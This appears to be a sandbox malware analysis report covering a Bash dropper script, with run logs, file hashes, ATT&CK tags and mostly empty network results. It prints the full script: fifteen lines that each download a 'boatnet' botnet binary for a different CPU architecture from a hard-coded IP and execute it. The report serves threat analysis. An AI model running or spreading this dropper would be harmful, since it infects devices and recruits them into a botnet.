2025-12-08 05:51:53,848 [root] INFO: Added new process to list with pid: 2268
2025-12-08 05:51:53,863 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2600, Max size: 100000000
2025-12-08 05:51:53,868 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2600, Max size: 100000000
2025-12-08 05:51:53,957 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2668, Max size: 100000000
2025-12-08 05:51:53,961 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2702, Max size: 100000000
2025-12-08 05:51:53,964 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2734, Max size: 100000000
2025-12-08 05:51:54,074 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2748, Max size: 100000000
2025-12-08 05:51:54,076 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2755, Max size: 100000000
2025-12-08 05:51:54,078 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2760, Max size: 100000000
2025-12-08 05:51:54,080 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2771, Max size: 100000000
2025-12-08 05:51:54,083 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2771, Max size: 100000000
2025-12-08 05:51:54,100 [root] INFO: New child process detected: 2274
2025-12-08 05:51:54,105 [root] ERROR: Could not read memory range 7f8817e76000-7f8817e84000: [Errno 5] Input/output error
2025-12-08 05:51:54,107 [root] ERROR: Could not read memory range 7ffe83c91000-7ffe83c95000: [Errno 5] Input/output error
2025-12-08 05:51:54,107 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2274.dmp size is 2301952, Max size: 100000000
2025-12-08 05:51:54,116 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2787, Max size: 100000000
2025-12-08 05:51:54,117 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2815, Max size: 100000000
2025-12-08 05:51:54,143 [root] INFO: Added new process to list with pid: 2274
2025-12-08 05:51:54,246 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2884, Max size: 100000000
2025-12-08 05:51:54,257 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2918, Max size: 100000000
2025-12-08 05:51:54,266 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2950, Max size: 100000000
2025-12-08 05:51:54,397 [root] INFO: New child process detected: 2279
2025-12-08 05:51:54,411 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2975, Max size: 100000000
2025-12-08 05:51:54,423 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2987, Max size: 100000000
2025-12-08 05:51:54,452 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3004, Max size: 100000000
2025-12-08 05:51:54,459 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2279.dmp size is 15196160, Max size: 100000000
2025-12-08 05:51:54,470 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3032, Max size: 100000000
2025-12-08 05:51:54,592 [root] INFO: Process with pid 2274 has terminated
2025-12-08 05:51:54,593 [root] INFO: Process with pid 2268 has terminated
2025-12-08 05:51:54,598 [root] INFO: Added new process to list with pid: 2279
2025-12-08 05:51:54,706 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3100, Max size: 100000000
2025-12-08 05:51:54,715 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3134, Max size: 100000000
2025-12-08 05:51:54,723 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3166, Max size: 100000000
2025-12-08 05:51:54,854 [root] INFO: New child process detected: 2285
2025-12-08 05:51:54,897 [root] ERROR: Could not read memory range 7ffddbde0000-7ffddbde4000: [Errno 5] Input/output error
2025-12-08 05:51:54,900 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2285.dmp size is 7397376, Max size: 100000000
2025-12-08 05:51:54,958 [root] INFO: Added new process to list with pid: 2285
2025-12-08 05:51:55,017 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3168, Max size: 100000000
2025-12-08 05:51:55,020 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3175, Max size: 100000000
2025-12-08 05:51:55,022 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3179, Max size: 100000000
2025-12-08 05:51:55,024 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3182, Max size: 100000000
2025-12-08 05:51:55,027 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3187, Max size: 100000000
2025-12-08 05:51:55,034 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3194, Max size: 100000000
2025-12-08 05:51:55,043 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3200, Max size: 100000000
2025-12-08 05:51:55,045 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3202, Max size: 100000000
2025-12-08 05:51:55,052 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3203, Max size: 100000000
2025-12-08 05:51:55,089 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 3247, Max size: 100000000
2025-12-08 05:51:55,597 [root] INFO: Process with pid 2176 has terminated
2025-12-08 05:51:55,597 [root] INFO: Process with pid 2279 has terminated
2025-12-08 05:51:55,597 [root] INFO: Process with pid 2285 has terminated
2025-12-08 05:51:55,598 [root] INFO: Process with pid 2169 has terminated
2025-12-08 05:51:55,598 [root] INFO: Process with pid 2171 has terminated
2025-12-08 05:51:55,598 [root] INFO: Process with pid 2172 has terminated
2025-12-08 05:51:55,598 [root] INFO: Process with pid 2175 has terminated
2025-12-08 05:51:55,598 [root] INFO: Process list is empty, terminating analysis
2025-12-08 05:51:56,599 [root] INFO: Stopping auxiliary modules
2025-12-08 05:51:56,600 [root] INFO: Stopping auxiliary module: Auditd
2025-12-08 05:51:56,600 [root] INFO: Stopping auxiliary module: FileCollector
2025-12-08 05:52:03,602 [root] INFO: Stopping auxiliary module: Human
2025-12-08 05:52:03,602 [root] INFO: Stopping auxiliary module: Screenshots
2025-12-08 05:52:03,602 [root] INFO: Stopping auxiliary module: Sysmon
2025-12-08 05:52:03,603 [modules.auxiliary.filecollector] INFO: FileCollector run completed
2025-12-08 05:52:03,615 [lib.common.results] INFO: File /tmp/sysmon.data size is 17, Max size: 100000000
2025-12-08 05:52:03,616 [root] INFO: Stopping auxiliary module: Docker
2025-12-08 05:52:03,616 [modules.auxiliary.tracee] DEBUG: Tracee module instructed to stop
2025-12-08 05:52:03,616 [modules.auxiliary.tracee] DEBUG: Tracee module instructed to stop + was enabled
2025-12-08 05:52:03,616 [modules.auxiliary.tracee] DEBUG: Tracee module skips log collection as it uses streaming
2025-12-08 05:52:05,771 [modules.auxiliary.tracee] DEBUG: Docker container stopped: tracee
2025-12-08 05:52:05,771 [root] INFO: Finishing auxiliary modules
2025-12-08 05:52:05,772 [lib.common.results] WARNING: File /sslkeylog.log doesn't exist anymore
2025-12-08 05:52:05,772 [root] INFO: Analysis completed
Machine

Name ubuntu22.04-64bit-1
Label ubuntu22.04-64bit-1
Manager KVM
Started On 2025-12-08 13:51:40
Shutdown On 2025-12-08 13:52:13

File Details

File Name 1cf0094b3df50bafb3e48.sh
File Type Bourne-Again shell script, ASCII text executable
File Size 2940 bytes
MD5 9114f27bcd7a096cb8a6259cf4687c41
SHA1 009f9067ea63717d59454e547b25bb3f0fa39de5
SHA256 1cf0094b3df50bafb3e480883add7aa16147bb5f32e684173e3fd65d406b10d0
SHA3-384 024044074da4f82d20e69d192d702dea1e37d924b1893326b4f6e4b6a91e34bfe251eb1eb7bea6aa99fa88a952c9d728
CRC32 51423343
TLSH T1A451E7C6C6860E302C63AA57E7B64DAC3483A1AF19E9EB95DDC8BBE0034ED147160753
Ssdeep 48:vL7m7N7hLd6GLgVzPLNKWLXoUL7X7o7ULfc3bL29RLjcgLqpVLVSOL5+CLsfTLEK:vL7m7N7hLd6GLgVzPLNKWLXoUL7X7o76

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.x86; curl -O http://79.133.46.243/hiddenbin/boatnet.x86;cat boatnet.x86 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.mips; curl -O http://79.133.46.243/hiddenbin/boatnet.mips;cat boatnet.mips >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.arc; curl -O http://79.133.46.243/hiddenbin/boatnet.arc;cat boatnet.arc >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.i468; curl -O http://79.133.46.243/hiddenbin/boatnet.i468;cat boatnet.i468 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.i686; curl -O http://79.133.46.243/hiddenbin/boatnet.i686;cat boatnet.i686 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.x86_64; curl -O http://79.133.46.243/hiddenbin/boatnet.x86_64;cat boatnet.x86_64 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.mpsl; curl -O http://79.133.46.243/hiddenbin/boatnet.mpsl;cat boatnet.mpsl >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.arm; curl -O http://79.133.46.243/hiddenbin/boatnet.arm;cat boatnet.arm >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.arm5; curl -O http://79.133.46.243/hiddenbin/boatnet.arm5;cat boatnet.arm5 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.arm6; curl -O http://79.133.46.243/hiddenbin/boatnet.arm6;cat boatnet.arm6 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.arm7; curl -O http://79.133.46.243/hiddenbin/boatnet.arm7;cat boatnet.arm7 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.ppc; curl -O http://79.133.46.243/hiddenbin/boatnet.ppc;cat boatnet.ppc >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.spc; curl -O http://79.133.46.243/hiddenbin/boatnet.spc;cat boatnet.spc >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.m68k; curl -O http://79.133.46.243/hiddenbin/boatnet.m68k;cat boatnet.m68k >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.133.46.243/hiddenbin/boatnet.sh4; curl -O http://79.133.46.243/hiddenbin/boatnet.sh4;cat boatnet.sh4 >WTF;chmod +x *;./WTF

Defense Evasion
  • T1070 - Indicator Removal
    • deletes_files
  • T1070.004 - File Deletion
    • deletes_files

Usage


Processing ( 25.41 seconds )

  • 23.768 CAPE
  • 0.623 Heatmap
  • 0.548 StraceAnalysis
  • 0.453 TraceeAnalysis
  • 0.012 AnalysisInfo
  • 0.002 NetworkAnalysis
  • 0.001 Debug

Signatures ( 0.00 seconds )

Reporting ( 2.83 seconds )

  • 2.758 MITRE_TTPS
  • 0.05 ReportHTML
  • 0.013 LiteReport
  • 0.013 JsonDump

Signatures

Reads files from disk
ReadFile: /lib/x86_64-linux-gnu/libc.so.6
ReadFile: /lib/x86_64-linux-gnu/libtinfo.so.6
ReadFile: /tmp/1cf0094b3df50bafb3e48.sh
ReadFile: /lib/x86_64-linux-gnu/libpcre2-8.so.0
ReadFile: /lib/x86_64-linux-gnu/libuuid.so.1
ReadFile: /lib/x86_64-linux-gnu/libidn2.so.0
ReadFile: /lib/x86_64-linux-gnu/libssl.so.3
ReadFile: /lib/x86_64-linux-gnu/libcrypto.so.3
ReadFile: /lib/x86_64-linux-gnu/libz.so.1
ReadFile: /lib/x86_64-linux-gnu/libpsl.so.5
ReadFile: /lib/x86_64-linux-gnu/libunistring.so.2
ReadFile: /etc/wgetrc
ReadFile: /etc/localtime
ReadFile: /usr/share/locale/locale.alias
ReadFile: /lib/x86_64-linux-gnu/libcurl.so.4
ReadFile: /lib/x86_64-linux-gnu/libnghttp2.so.14
ReadFile: /lib/x86_64-linux-gnu/librtmp.so.1
ReadFile: /lib/x86_64-linux-gnu/libssh.so.4
ReadFile: /lib/x86_64-linux-gnu/libgssapi_krb5.so.2
ReadFile: /lib/x86_64-linux-gnu/libldap-2.5.so.0
ReadFile: /lib/x86_64-linux-gnu/liblber-2.5.so.0
ReadFile: /lib/x86_64-linux-gnu/libzstd.so.1
ReadFile: /lib/x86_64-linux-gnu/libbrotlidec.so.1
ReadFile: /lib/x86_64-linux-gnu/libgnutls.so.30
ReadFile: /lib/x86_64-linux-gnu/libhogweed.so.6
ReadFile: /lib/x86_64-linux-gnu/libnettle.so.8
ReadFile: /lib/x86_64-linux-gnu/libgmp.so.10
ReadFile: /lib/x86_64-linux-gnu/libkrb5.so.3
ReadFile: /lib/x86_64-linux-gnu/libk5crypto.so.3
ReadFile: /lib/x86_64-linux-gnu/libcom_err.so.2
ReadFile: /lib/x86_64-linux-gnu/libkrb5support.so.0
ReadFile: /lib/x86_64-linux-gnu/libsasl2.so.2
ReadFile: /lib/x86_64-linux-gnu/libbrotlicommon.so.1
ReadFile: /lib/x86_64-linux-gnu/libp11-kit.so.0
ReadFile: /lib/x86_64-linux-gnu/libtasn1.so.6
ReadFile: /lib/x86_64-linux-gnu/libkeyutils.so.1
ReadFile: /lib/x86_64-linux-gnu/libresolv.so.2
ReadFile: /lib/x86_64-linux-gnu/libffi.so.8
ReadFile: /usr/lib/ssl/openssl.cnf
ReadFile: /etc/nsswitch.conf
ReadFile: /etc/passwd
ReadFile: ./WTF
Drops files onto disk
DroppedFile: WTF (15 occurrences, one per download line in the script)
Writes to files on disk
WriteFile: STDERR
Deletes files from disk
DeletedFile: "WTF" (15 occurrences, one per download line in the script)

Screenshots

No screenshots available.
No playback available.

Hosts

No hosts contacted.

DNS

No domains contacted.

Summary

No results
Sorry! No behavior.
Sorry! No tracee.
Sorry! No strace.

No TCP connections recorded.

No UDP connections recorded.

HTTP Requests

No HTTP(s) requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No Suricata Extracted files.
Sorry! No dropped files.
Sorry! No process dumps.